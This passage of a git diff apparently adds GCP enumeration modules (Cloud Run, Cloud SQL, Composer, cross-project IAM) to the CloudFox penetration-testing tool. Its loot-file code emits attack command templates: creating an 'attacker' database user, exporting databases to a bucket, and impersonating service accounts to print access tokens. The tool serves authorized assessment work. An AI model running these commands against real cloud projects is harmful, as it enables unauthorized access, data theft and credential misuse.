[]string{ + "Project ID", + "Name", + "Region", + "Service Account", + "Image", + "Tasks", + "Parallelism", + "Last Execution", + "Secrets", + } + + var jobsBody [][]string + for _, job := range m.Jobs { + // Format secrets count + secretCount := job.SecretEnvVarCount + job.SecretVolumeCount + secrets := "-" + if secretCount > 0 { + secrets = fmt.Sprintf("%d", secretCount) + } + + // Format image + image := truncateImage(job.ContainerImage) + + // Format service account + saDisplay := truncateSA(job.ServiceAccount) + + // Format last execution + lastExec := "-" + if job.LastExecution != "" { + lastExec = extractName(job.LastExecution) + } + + jobsBody = append(jobsBody, []string{ + job.ProjectID, + job.Name, + job.Region, + saDisplay, + image, + fmt.Sprintf("%d", job.TaskCount), + fmt.Sprintf("%d", job.Parallelism), + lastExec, + secrets, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(servicesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-services", + Header: servicesHeader, + Body: servicesBody, + }) + } + + if len(jobsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_CLOUDRUN_MODULE_NAME + "-jobs", + Header: jobsHeader, + Body: jobsBody, + }) + } + + output := CloudRunOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDRUN_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// formatIngress formats ingress settings for display +func formatIngress(ingress string) string { + switch ingress { + case "INGRESS_TRAFFIC_ALL": + return "ALL (Public)" + case "INGRESS_TRAFFIC_INTERNAL_ONLY": + return "INTERNAL" + case "INGRESS_TRAFFIC_INTERNAL_LOAD_BALANCER": + return "INT+LB" + default: + return ingress + } +} + +// truncateImage truncates container image for readability +func truncateImage(image string) string { + // Remove common registry prefixes + prefixes := []string{ + "gcr.io/", + "us-docker.pkg.dev/", + "us-central1-docker.pkg.dev/", + "europe-docker.pkg.dev/", + "asia-docker.pkg.dev/", + } + + for _, prefix := range prefixes { + if strings.HasPrefix(image, prefix) { + image = strings.TrimPrefix(image, prefix) + break + } + } + + // Truncate if still too long + if len(image) > 50 { + return image[:47] + "..." + } + return image +} + +// truncateSA truncates service account email for readability +func truncateSA(sa string) string { + if len(sa) > 40 { + // Show name part only + if idx := strings.Index(sa, "@"); idx > 0 { + name := sa[:idx] + if len(name) > 30 { + return name[:27] + "...@..." + } + return name + "@..." + } + return sa[:37] + "..." + } + return sa +} + +// extractName extracts just the name from a resource path +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/commands/cloudsql.go b/gcp/commands/cloudsql.go new file mode 100644 index 00000000..ac906741 --- /dev/null +++ b/gcp/commands/cloudsql.go @@ -0,0 +1,473 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudSQLService "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudSQLCommand = &cobra.Command{ + Use: globals.GCP_CLOUDSQL_MODULE_NAME, + Aliases: []string{"sql", "database", "db"}, + Short: "Enumerate Cloud SQL instances with security analysis", + Long: `Enumerate Cloud SQL instances across projects with security-relevant details. + +Features: +- Lists all Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Shows network configuration (public/private IP, authorized networks) +- Identifies publicly accessible databases +- Shows SSL/TLS configuration and requirements +- Checks backup and high availability configuration +- Identifies common security misconfigurations +- Generates gcloud commands for further analysis + +Security Columns: +- PublicIP: Whether the instance has a public IP address +- RequireSSL: Whether SSL/TLS is required for connections +- AuthNetworks: Number of authorized network ranges +- Backups: Automated backup status +- HA: High availability configuration +- Issues: Detected security misconfigurations + +Attack Surface: +- Public IPs expose database to internet scanning +- Missing SSL allows credential sniffing +- 0.0.0.0/0 in authorized networks = world accessible +- Default service accounts may have excessive permissions`, + Run: runGCPCloudSQLCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudSQLModule struct { + gcpinternal.BaseGCPModule + + Instances []CloudSQLService.SQLInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudSQLOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudSQLOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudSQLOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudSQLCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDSQL_MODULE_NAME) + if err != nil { + return + } + + module := &CloudSQLModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Instances: []CloudSQLService.SQLInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudSQLModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDSQL_MODULE_NAME, m.processProject) + + if len(m.Instances) == 0 { + logger.InfoM("No Cloud SQL instances found", globals.GCP_CLOUDSQL_MODULE_NAME) + return + } + + // Count public instances + publicCount := 0 + for _, instance := range m.Instances { + if instance.HasPublicIP { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d instance(s), %d with public IP", len(m.Instances), publicCount), globals.GCP_CLOUDSQL_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d instance(s)", len(m.Instances)), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudSQLModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud SQL instances in project: %s", projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } + + cs := CloudSQLService.New() + instances, err := cs.Instances(projectID) + if err != nil { + m.CommandCounter.Error++ + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error enumerating Cloud SQL in project %s: %v", projectID, err), globals.GCP_CLOUDSQL_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Instances = append(m.Instances, instances...) + + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d instance(s) in project %s", len(instances), projectID), globals.GCP_CLOUDSQL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudSQLModule) initializeLootFiles() { + m.LootMap["cloudsql-gcloud-commands"] = &internal.LootFile{ + Name: "cloudsql-gcloud-commands", + Contents: "# Cloud SQL gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["cloudsql-connection-strings"] = &internal.LootFile{ + Name: "cloudsql-connection-strings", + Contents: "# Cloud SQL Connection Strings\n# Generated by CloudFox\n# NOTE: You'll need to obtain credentials separately\n\n", + } + m.LootMap["cloudsql-exploitation"] = &internal.LootFile{ + Name: "cloudsql-exploitation", + Contents: "# Cloud SQL Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cloudsql-public"] = &internal.LootFile{ + Name: "cloudsql-public", + Contents: "# PUBLIC Cloud SQL Instances\n# Generated by CloudFox\n# These instances have public IP addresses!\n\n", + } + m.LootMap["cloudsql-security-issues"] = &internal.LootFile{ + Name: "cloudsql-security-issues", + Contents: "# Cloud SQL Security Issues Detected\n# Generated by CloudFox\n\n", + } +} + +func (m *CloudSQLModule) addInstanceToLoot(instance CloudSQLService.SQLInstanceInfo) { + // gcloud commands + m.LootMap["cloudsql-gcloud-commands"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s, Region: %s)\n"+ + "gcloud sql instances describe %s --project=%s\n"+ + "gcloud sql databases list --instance=%s --project=%s\n"+ + "gcloud sql users list --instance=%s --project=%s\n"+ + "gcloud sql ssl-certs list --instance=%s --project=%s\n"+ + "gcloud sql backups list --instance=%s --project=%s\n\n", + instance.Name, instance.ProjectID, instance.Region, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, + ) + + // Connection strings based on database type + dbType := getDatabaseType(instance.DatabaseVersion) + connectionInstance := fmt.Sprintf("%s:%s:%s", instance.ProjectID, instance.Region, instance.Name) + + m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( + "# Instance: %s (%s)\n"+ + "# Public IP: %s\n"+ + "# Private IP: %s\n"+ + "# Connection Name: %s\n", + instance.Name, instance.DatabaseVersion, + instance.PublicIP, + instance.PrivateIP, + connectionInstance, + ) + + switch dbType { + case "mysql": + m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( + "# MySQL Connection:\n"+ + "mysql -h %s -u root -p\n"+ + "# Cloud SQL Proxy:\n"+ + "cloud_sql_proxy -instances=%s=tcp:3306\n"+ + "mysql -h 127.0.0.1 -u root -p\n\n", + instance.PublicIP, connectionInstance, + ) + case "postgres": + m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( + "# PostgreSQL Connection:\n"+ + "psql -h %s -U postgres\n"+ + "# Cloud SQL Proxy:\n"+ + "cloud_sql_proxy -instances=%s=tcp:5432\n"+ + "psql -h 127.0.0.1 -U postgres\n\n", + instance.PublicIP, connectionInstance, + ) + case "sqlserver": + m.LootMap["cloudsql-connection-strings"].Contents += fmt.Sprintf( + "# SQL Server Connection:\n"+ + "sqlcmd -S %s -U sqlserver\n"+ + "# Cloud SQL Proxy:\n"+ + "cloud_sql_proxy -instances=%s=tcp:1433\n"+ + "sqlcmd -S 127.0.0.1 -U sqlserver\n\n", + instance.PublicIP, connectionInstance, + ) + } + + // Exploitation commands + m.LootMap["cloudsql-exploitation"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s)\n"+ + "# Database: %s\n"+ + "# Public IP: %s, Private IP: %s\n"+ + "# SSL Required: %v\n\n"+ + "# Connect via Cloud SQL Proxy (recommended):\n"+ + "cloud_sql_proxy -instances=%s=tcp:3306 &\n\n"+ + "# Create a new user (if you have sql.users.create):\n"+ + "gcloud sql users create attacker --instance=%s --password=AttackerPass123! --project=%s\n\n"+ + "# Export database (if you have sql.instances.export):\n"+ + "gcloud sql export sql %s gs://%s-backup/export.sql --database=mysql --project=%s\n\n", + instance.Name, instance.ProjectID, + instance.DatabaseVersion, + instance.PublicIP, instance.PrivateIP, + instance.RequireSSL, + connectionInstance, + instance.Name, instance.ProjectID, + instance.Name, instance.ProjectID, instance.ProjectID, + ) + + // Public instances + if instance.HasPublicIP { + m.LootMap["cloudsql-public"].Contents += fmt.Sprintf( + "# INSTANCE: %s\n"+ + "# Project: %s, Region: %s\n"+ + "# Database: %s\n"+ + "# Public IP: %s\n"+ + "# SSL Required: %v\n"+ + "# Authorized Networks: %d\n", + instance.Name, + instance.ProjectID, instance.Region, + instance.DatabaseVersion, + instance.PublicIP, + instance.RequireSSL, + len(instance.AuthorizedNetworks), + ) + for _, network := range instance.AuthorizedNetworks { + marker := "" + if network.IsPublic { + marker = " [WORLD ACCESSIBLE!]" + } + m.LootMap["cloudsql-public"].Contents += fmt.Sprintf( + "# - %s: %s%s\n", + network.Name, network.Value, marker, + ) + } + m.LootMap["cloudsql-public"].Contents += "\n" + } + + // Security issues + if len(instance.SecurityIssues) > 0 { + m.LootMap["cloudsql-security-issues"].Contents += fmt.Sprintf( + "# INSTANCE: %s (Project: %s)\n"+ + "# Database: %s\n"+ + "# Issues:\n", + instance.Name, instance.ProjectID, instance.DatabaseVersion, + ) + for _, issue := range instance.SecurityIssues { + m.LootMap["cloudsql-security-issues"].Contents += fmt.Sprintf(" - %s\n", issue) + } + m.LootMap["cloudsql-security-issues"].Contents += "\n" + } +} + +// getDatabaseType returns the database type from version string +func getDatabaseType(version string) string { + switch { + case strings.HasPrefix(version, "MYSQL"): + return "mysql" + case strings.HasPrefix(version, "POSTGRES"): + return "postgres" + case strings.HasPrefix(version, "SQLSERVER"): + return "sqlserver" + default: + return "unknown" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main instances table + header := []string{ + "Project ID", + "Name", + "Region", + "Database", + "Tier", + "State", + "Public IP", + "Private IP", + "Require SSL", + "Auth Networks", + "Backups", + "HA", + "Issues", + } + + var body [][]string + for _, instance := range m.Instances { + // Format authorized networks count + authNetworks := fmt.Sprintf("%d", len(instance.AuthorizedNetworks)) + hasPublicNetwork := false + for _, network := range instance.AuthorizedNetworks { + if network.IsPublic { + hasPublicNetwork = true + break + } + } + if hasPublicNetwork { + authNetworks += " (PUBLIC!)" + } + + // Format issues + issueDisplay := "-" + if len(instance.SecurityIssues) > 0 { + issueDisplay = fmt.Sprintf("%d issues", len(instance.SecurityIssues)) + } + + body = append(body, []string{ + instance.ProjectID, + instance.Name, + instance.Region, + instance.DatabaseVersion, + instance.Tier, + instance.State, + instance.PublicIP, + instance.PrivateIP, + boolToYesNo(instance.RequireSSL), + authNetworks, + boolToYesNo(instance.BackupEnabled), + instance.AvailabilityType, + issueDisplay, + }) + } + + // Security issues table + issuesHeader := []string{ + "Instance", + "Project ID", + "Database", + "Issue", + } + + var issuesBody [][]string + for _, instance := range m.Instances { + for _, issue := range instance.SecurityIssues { + issuesBody = append(issuesBody, []string{ + instance.Name, + instance.ProjectID, + instance.DatabaseVersion, + issue, + }) + } + } + + // Authorized networks table + networksHeader := []string{ + "Instance", + "Project ID", + "Network Name", + "CIDR", + "Public Access", + } + + var networksBody [][]string + for _, instance := range m.Instances { + for _, network := range instance.AuthorizedNetworks { + publicAccess := "No" + if network.IsPublic { + publicAccess = "YES - WORLD ACCESSIBLE" + } + networksBody = append(networksBody, []string{ + instance.Name, + instance.ProjectID, + network.Name, + network.Value, + publicAccess, + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{ + { + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }, + } + + if len(issuesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudsql-security-issues", + Header: issuesHeader, + Body: issuesBody, + }) + } + + if len(networksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloudsql-authorized-networks", + Header: networksHeader, + Body: networksBody, + }) + } + + output := CloudSQLOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go new file mode 100644 index 00000000..95f80a3f --- /dev/null +++ b/gcp/commands/composer.go @@ -0,0 +1,211 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPComposerCommand = &cobra.Command{ + Use: globals.GCP_COMPOSER_MODULE_NAME, + Aliases: []string{"airflow"}, + Short: "Enumerate Cloud Composer environments", + Long: `Enumerate Cloud Composer (managed Apache Airflow) environments. + +Features: +- Lists all Composer environments across locations +- Shows Airflow web UI endpoints +- Identifies service account configuration +- Analyzes network exposure (private vs public) +- Detects overly permissive IP restrictions`, + Run: runGCPComposerCommand, +} + +type ComposerModule struct { + gcpinternal.BaseGCPModule + Environments []composerservice.EnvironmentInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type ComposerOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o ComposerOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ComposerOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPComposerCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_COMPOSER_MODULE_NAME) + if err != nil { + return + } + + module := &ComposerModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Environments: []composerservice.EnvironmentInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) + + if len(m.Environments) == 0 { + logger.InfoM("No Composer environments found", globals.GCP_COMPOSER_MODULE_NAME) + return + } + + // Count by state + running := 0 + publicEnvs := 0 + for _, env := range m.Environments { + if env.State == "RUNNING" { + running++ + } + if !env.PrivateEnvironment { + publicEnvs++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Composer environment(s) (%d running, %d public)", + len(m.Environments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *ComposerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Composer in project: %s", projectID), globals.GCP_COMPOSER_MODULE_NAME) + } + + svc := composerservice.New() + environments, err := svc.ListEnvironments(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list Composer environments: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } + return + } + + m.mu.Lock() + m.Environments = append(m.Environments, environments...) + for _, env := range environments { + m.addToLoot(env) + } + m.mu.Unlock() +} + +func (m *ComposerModule) initializeLootFiles() { + m.LootMap["composer-environments"] = &internal.LootFile{ + Name: "composer-environments", + Contents: "# Composer Environments\n# Generated by CloudFox\n\n", + } + m.LootMap["composer-airflow-urls"] = &internal.LootFile{ + Name: "composer-airflow-urls", + Contents: "", + } + m.LootMap["composer-dag-buckets"] = &internal.LootFile{ + Name: "composer-dag-buckets", + Contents: "", + } +} + +func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { + m.LootMap["composer-environments"].Contents += fmt.Sprintf( + "# Environment: %s\n# State: %s\n# Service Account: %s\n# Private: %v\n# Airflow URI: %s\n\n", + env.Name, env.State, env.ServiceAccount, env.PrivateEnvironment, env.AirflowURI) + + if env.AirflowURI != "" { + m.LootMap["composer-airflow-urls"].Contents += env.AirflowURI + "\n" + } + + if env.DagGcsPrefix != "" { + m.LootMap["composer-dag-buckets"].Contents += env.DagGcsPrefix + "\n" + } +} + +func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Name", "State", "Location", "Service Account", + "Private", "Airflow URI", "Risk", "Project", + } + + var body [][]string + for _, env := range m.Environments { + private := "No" + if env.PrivateEnvironment { + private = "Yes" + } + + sa := env.ServiceAccount + if sa == "" { + sa = "(default)" + } else if len(sa) > 40 { + sa = sa[:37] + "..." + } + + airflowURI := env.AirflowURI + if len(airflowURI) > 50 { + airflowURI = airflowURI[:47] + "..." + } + + body = append(body, []string{ + env.Name, + env.State, + env.Location, + sa, + private, + airflowURI, + env.RiskLevel, + env.ProjectID, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "composer", Header: header, Body: body}} + + // High-risk environments table + var highRiskBody [][]string + for _, env := range m.Environments { + if env.RiskLevel == "HIGH" || env.RiskLevel == "MEDIUM" { + highRiskBody = append(highRiskBody, []string{ + env.Name, + env.RiskLevel, + strings.Join(env.RiskReasons, "; "), + env.ProjectID, + }) + } + } + + if len(highRiskBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "composer-risks", + Header: []string{"Environment", "Risk Level", "Reasons", "Project"}, + Body: highRiskBody, + }) + } + + output := ComposerOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go new file mode 100644 index 00000000..77e959a3 --- /dev/null +++ b/gcp/commands/crossproject.go @@ -0,0 +1,419 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + crossprojectservice "github.com/BishopFox/cloudfox/gcp/services/crossProjectService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCrossProjectCommand = &cobra.Command{ + Use: globals.GCP_CROSSPROJECT_MODULE_NAME, + Aliases: []string{"cross-project", "xproject", "lateral"}, + Short: "Analyze cross-project access patterns for lateral movement", + Long: `Analyze cross-project IAM bindings to identify lateral movement paths. + +This module is designed for penetration testing and identifies: +- Service accounts with access to multiple projects +- Cross-project IAM role bindings +- Potential lateral movement paths between projects + +Features: +- Maps cross-project service account access +- Identifies high-risk cross-project roles (owner, editor, admin) +- Generates exploitation commands for lateral movement +- Highlights service accounts spanning trust boundaries + +Risk Analysis: +- CRITICAL: Owner/Editor/Admin roles across projects +- HIGH: Sensitive admin roles (IAM, Secrets, Compute) +- MEDIUM: Standard roles with cross-project access +- LOW: Read-only cross-project access + +WARNING: Requires multiple projects to be specified for effective analysis. +Use -p for single project or -l for project list file.`, + Run: runGCPCrossProjectCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CrossProjectModule struct { + gcpinternal.BaseGCPModule + + CrossBindings []crossprojectservice.CrossProjectBinding + CrossProjectSAs []crossprojectservice.CrossProjectServiceAccount + LateralMovementPaths []crossprojectservice.LateralMovementPath + LootMap map[string]*internal.LootFile +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CrossProjectOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CrossProjectOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CrossProjectOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCrossProjectCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CROSSPROJECT_MODULE_NAME) + if err != nil { + return + } + + if len(cmdCtx.ProjectIDs) < 2 { + cmdCtx.Logger.InfoM("Cross-project analysis works best with multiple projects. Consider using -l to specify a project list.", globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + module := &CrossProjectModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CrossBindings: []crossprojectservice.CrossProjectBinding{}, + CrossProjectSAs: []crossprojectservice.CrossProjectServiceAccount{}, + LateralMovementPaths: []crossprojectservice.LateralMovementPath{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Analyzing cross-project access patterns across %d project(s)...", len(m.ProjectIDs)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + svc := crossprojectservice.New() + + // Analyze cross-project bindings + bindings, err := svc.AnalyzeCrossProjectAccess(m.ProjectIDs) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error analyzing cross-project access: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + } + } else { + m.CrossBindings = bindings + } + + // Get cross-project service accounts + sas, err := svc.GetCrossProjectServiceAccounts(m.ProjectIDs) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting cross-project service accounts: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + } + } else { + m.CrossProjectSAs = sas + } + + // Find lateral movement paths + paths, err := svc.FindLateralMovementPaths(m.ProjectIDs) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error finding lateral movement paths: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + } + } else { + m.LateralMovementPaths = paths + } + + if len(m.CrossBindings) == 0 && len(m.CrossProjectSAs) == 0 && len(m.LateralMovementPaths) == 0 { + logger.InfoM("No cross-project access patterns found", globals.GCP_CROSSPROJECT_MODULE_NAME) + return + } + + // Count high-risk findings + criticalCount := 0 + highCount := 0 + for _, binding := range m.CrossBindings { + switch binding.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + m.addBindingToLoot(binding) + } + + for _, sa := range m.CrossProjectSAs { + m.addServiceAccountToLoot(sa) + } + + for _, path := range m.LateralMovementPaths { + m.addLateralMovementToLoot(path) + } + + logger.SuccessM(fmt.Sprintf("Found %d cross-project binding(s), %d cross-project SA(s), %d lateral movement path(s)", + len(m.CrossBindings), len(m.CrossProjectSAs), len(m.LateralMovementPaths)), globals.GCP_CROSSPROJECT_MODULE_NAME) + + if criticalCount > 0 || highCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d CRITICAL, %d HIGH risk cross-project bindings!", criticalCount, highCount), globals.GCP_CROSSPROJECT_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CrossProjectModule) initializeLootFiles() { + m.LootMap["cross-project-bindings"] = &internal.LootFile{ + Name: "cross-project-bindings", + Contents: "# Cross-Project IAM Bindings\n# Generated by CloudFox\n# Service accounts and users with access across project boundaries\n\n", + } + m.LootMap["cross-project-sas"] = &internal.LootFile{ + Name: "cross-project-sas", + Contents: "# Cross-Project Service Accounts\n# Generated by CloudFox\n# Service accounts with access to multiple projects\n\n", + } + m.LootMap["lateral-movement-paths"] = &internal.LootFile{ + Name: "lateral-movement-paths", + Contents: "# Lateral Movement Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cross-project-exploitation"] = &internal.LootFile{ + Name: "cross-project-exploitation", + Contents: "# Cross-Project Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { + m.LootMap["cross-project-bindings"].Contents += fmt.Sprintf( + "## [%s] %s -> %s\n"+ + "## Principal: %s\n"+ + "## Role: %s\n", + binding.RiskLevel, binding.SourceProject, binding.TargetProject, + binding.Principal, + binding.Role, + ) + + if len(binding.RiskReasons) > 0 { + m.LootMap["cross-project-bindings"].Contents += "## Risk Reasons:\n" + for _, reason := range binding.RiskReasons { + m.LootMap["cross-project-bindings"].Contents += fmt.Sprintf("## - %s\n", reason) + } + } + m.LootMap["cross-project-bindings"].Contents += "\n" + + // Exploitation commands + if len(binding.ExploitCommands) > 0 && (binding.RiskLevel == "CRITICAL" || binding.RiskLevel == "HIGH") { + m.LootMap["cross-project-exploitation"].Contents += fmt.Sprintf( + "## [%s] %s -> %s via %s\n", + binding.RiskLevel, binding.SourceProject, binding.TargetProject, binding.Role, + ) + for _, cmd := range binding.ExploitCommands { + m.LootMap["cross-project-exploitation"].Contents += cmd + "\n" + } + m.LootMap["cross-project-exploitation"].Contents += "\n" + } +} + +func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { + m.LootMap["cross-project-sas"].Contents += fmt.Sprintf( + "## Service Account: %s\n"+ + "## Home Project: %s\n"+ + "## Cross-Project Access:\n", + sa.Email, sa.ProjectID, + ) + for _, access := range sa.TargetAccess { + m.LootMap["cross-project-sas"].Contents += fmt.Sprintf("## - %s\n", access) + } + m.LootMap["cross-project-sas"].Contents += "\n" + + // Add impersonation commands + m.LootMap["cross-project-exploitation"].Contents += fmt.Sprintf( + "## Impersonate cross-project SA: %s\n"+ + "gcloud auth print-access-token --impersonate-service-account=%s\n\n", + sa.Email, sa.Email, + 